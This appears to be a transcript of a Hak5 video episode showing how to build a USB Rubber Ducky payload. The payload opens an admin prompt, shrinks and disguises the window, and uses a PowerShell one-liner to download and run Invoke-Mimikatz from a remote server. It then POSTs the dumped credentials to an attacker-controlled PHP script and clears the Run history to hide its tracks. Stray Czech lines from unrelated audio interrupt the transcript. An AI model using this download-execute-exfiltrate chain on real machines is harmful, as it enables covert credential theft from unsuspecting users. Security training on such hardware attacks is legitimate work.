I'm sorry. Now I want to stop watching this. Go watch Strongbad. Come back. Okay. Step 2. What we're gonna do is we're gonna open an admin command prompt. So that's what this section here is. So basically, GUI R is the equivalent of Windows key R. And we're going to hit Enter, followed by Alt-Y. So let's go ahead and do this in this Windows VM to check that out. So every Windows key R, this little run line. And you'll actually notice I already have that in there because it was the last command written. But I'll go ahead and, well, I'll grab it from the history. There we go. So that's what it's going to do. It's going to pull this up and type this PowerShell.
Okay.
So what it's doing is it's doing a start process. What process are we starting? CMD. Okay, that's the command prompt. Well, this verb, run as, what run as means is run as administrator. So when we hit OK, we're going to be UAC, which means, oh no, it's thwarted our ability to become the admin. The fact that if you hold down, notice this. Notice a second ago. Here, let me see how it's
Press Y.
And there we are. Administration.
Awesome.
So voila, we have our command prompt. Everything is good to go.
So now that we have that up and running and open, it's going to be kind of obvious, like when I walk back to my computer after getting something off the printer, that somebody's been messing with my computer.
Right? I mean, normies are not used to seeing terminals open. That's
Right?
scary hacker stuff.
Green text
so
is going to freak them out.
yeah. Oh, I don't remember the as a tip next week. But so
What, green text?
to be a real hacker. So what we're going to want to do in this case is a little bit of obfuscation of the command prompt, because while it's not, it is nice to kind of like obscure the fact that you're doing all this hacker good stuff and bring as little attention to this as possible. And depending on your scenario, it may or may not be necessary, but let's just go ahead and get into some of the techniques. So this next obfuscation technique here is we're going to type in mode, and then here, let me just pop that in my clipboard. So this command here, mode con calls equals 18, lines equals 1, is telling this command prompt to go 18 columns by 1 line. Boom.
Oh, okay.
Ridiculously small.
So it's making it small. Cool.
Right. The next one is to type in color space capital F capital E. And that makes the background white and the foreground yellow, which is ridiculously hard to
Oh,
see.
so it looks like a browser window.
The idea here is we're just going to try to make it as tiny as possible and white and kind of just blend in with the other stuff on the screens.
Gotcha.
Thankfully, this payload is so extremely short that it'll only be open for the briefest amount of time anyway.
Okay, so at this point, we are ready to actually download and to execute the payload. We're not messing with colors anymore.
Right, so let's go ahead and get into that. The next part down here is this PowerShell. So let's go ahead and take a look at this PowerShell. So it's actually just this one string, and it's kind of long. And to make this easier, I'm actually going to go ahead and open another command prompt, but this one I'm not going to obfuscate because I want you to be able to see this and I'll kind of dissect this PowerShell.
Okay.
So this command right here, obviously PowerShell means, hey, command prompt, go ahead and execute this with PowerShell. The IEX part right here basically means invoke expression. That's a directive that tells it to execute everything following this rather than just echoing it back to the command line. Then we have a new dash object. That commandlet creates an instance of the Microsoft.NET framework, and then we're going to use a net.webclient. Net.webclient is basically, it's a class that allows us to send and receive data from standard web servers.
Okay.
So after that, we'll do a download string. So this right here, download string, and then
I'm assuming that downloads something.
yeah, it does. And
Derp, derp.
derp derp. And what we do is we just pass it a URL. It's a method that downloads this resource, and we specify, in my case, I'm specifying http://darren.kitchen/creds/im for invoke mimikatz.ps1 for PowerShell. And the next setting a variable $output, and it's saying invoke mimikatz with the dump creds directive. Okay?
Okay.
Then what's going to happen here is the resulting pattern is going to be stored in output. Then finally, we have like a semicolon here, so we're starting a new command, and that's going to be new object, just like before. Instead of download string, we're using upload string. Upload string is a method that takes two different parameters. The first one is a URL. So in this case, http://darren.kitchen, that would be your website, not mine, /creds/rx.php. That's a PHP script that I have up there waiting for this. And what are we going to sign output. So as long as we have that rx.php file living in the cloud waiting for this, it's going to be passed as a HTTP post, as a just standard, web post over to this PHP script, and then you'll see that we're going to save it, and then for our later viewing pleasure. So I'm going to go ahead and do this. Now, I want you to understand that in this example, I'm using Darren.kitchen. Change that to match your own URL.
Yeah, I mean, like, if rad.
V té indexaci Googlem, protože 25 000 stránek takhle.
Shell commands in the history.
Absolutely. Here, that, and you'll see it's just executing in the background. And but to what you said, if I pull up Windows key R,
you're going to
you'll
see it. Yeah.
Exactly. So we probably want to clear our tracks, and since CMD, this command prompt here, doesn't natively maintain a persistent command history like you do in Linux, everything typed into
so it's
the
not like the terminal.
No, it's not like the Linux terminal. Bash. That would be some alternate universe, and nobody would believe that for a minute.
Si přesně na Instagram dal tu fotku, kde jste si mohli pomocí v podstatě
as well as maintains the command history and in the registry. So results of that here in a second. But let's go ahead and say we do exit, and that. To get what we're going to do is we're going to use of PowerShell. So if I come down here, after that, the last part of our duck script is to run this PowerShell here. So if we pull that command prompt back up,
No.
A Windows Red, and then the next thing we'll say is the name. So this TAC name here, and we're using asterisk or star. That's a wildcard.
Wildcards, yay!
Yay! And that's basically saying delete all of the items in there, especially that item run MRU. So if you open up this this in Registry Editor, you're going to see that it basically maintains the history in there, and this is just going to clear the whole thing out. So let's go ahead and just execute this. Boop. And now when I hit Windows key R, you'll notice that there
Nothing
are.
is there.
Nope, it's
Cool.
all cleared out.
Okay.
So
So is there anything else to it?
I mean, yeah, we have to encode it, we have to plug it into the duck, we have to set up
But
our
that's it for
server.
the Ducky script.
That's it for the Ducky script.
Wow. Okay, so this payload is going to be available on the forums, and we are also going to link it from your article as well on hack5.org. I'm assuming that we're going to need to set up some server-side stuff also to make this obviously work. So let's go ahead and take a quick break, and then we'll get back into that when we get back.
When you've got that great idea like owning a computer in 15 seconds or less, you know that you need to bring it to the interweb and share it with the world. So please do what Shannon and I do, and that's head over to domain.com. These guys have an awesome domain discovery system that'll help you choose the right domain, and their easy checkout process will have your website up and online in no time flat. And get this, the guys over at domain.com, huge fans of Hack5 and you guys, so we have a special coupon code just for you. It's HAK5. That spells Hack5, and it'll also save you 20% at checkout. So check that out. Isn't that awesome? Guys at domain.com are huge fans, and we want to show them support. So even if you don't need a domain this exact moment, you should tweet them at domain.com and say, hey, thanks for supporting Hack5 all these years. And when you think domain names, think domain.com.
Now that the Mimikatz Ducky script has been set up and it's pointing over at our web server URL, we are going to need to encode the payload and then set up the server itself.
Right, which means the USB rubber ducky, which is expecting, in fact, here it is. This little guy isn't expecting not that text file that we wrote, but rather a file called inject.bin on the root of its micro SD card. There's a little SD card guy that just goes in here, which means that you can carry around multiple payloads by just carrying around multiple inexpensive micro SD cards. Fantastic. Anyway, this inject.bin file that it's expecting on the root of the micro SD card is basically the binary equivalent of that Ducky script text file that we wrote previously in Nano, or you could do it in VI.
So we're going to have to convert it.
Yeah, we need to go ahead and convert that. And so to do that, we use the duck encoder. So let me go ahead and show you what that looks like.
Duck encode.
Duck encode. So I have it right here, and you'll see if I my invoke mimikatz.txt, that's my payload, and then I've got my duck encode.jar. Duck encoder. So we'll do java tac jar, duck encode.jar, tac I for the input file, which is invoke mimikatz.txt, and then tac O inject.bin, right? So that will be the output file. So I run that. Now if I ls again, you'll see that I have an inject.bin file.
Yay.
So all I have to do is put that on the root of the micro SD card. So let me go ahead and pop that SD card in the reader.
Do you have to name it inject?
Yes, you do.
Okay.
So I've gone ahead and plugged the card reader into the computer. I can see I have a new volume. I can open it up with files and see there's already an inject.bin, which I'm just going to go ahead and delete, or I'm going to rename it as my backup.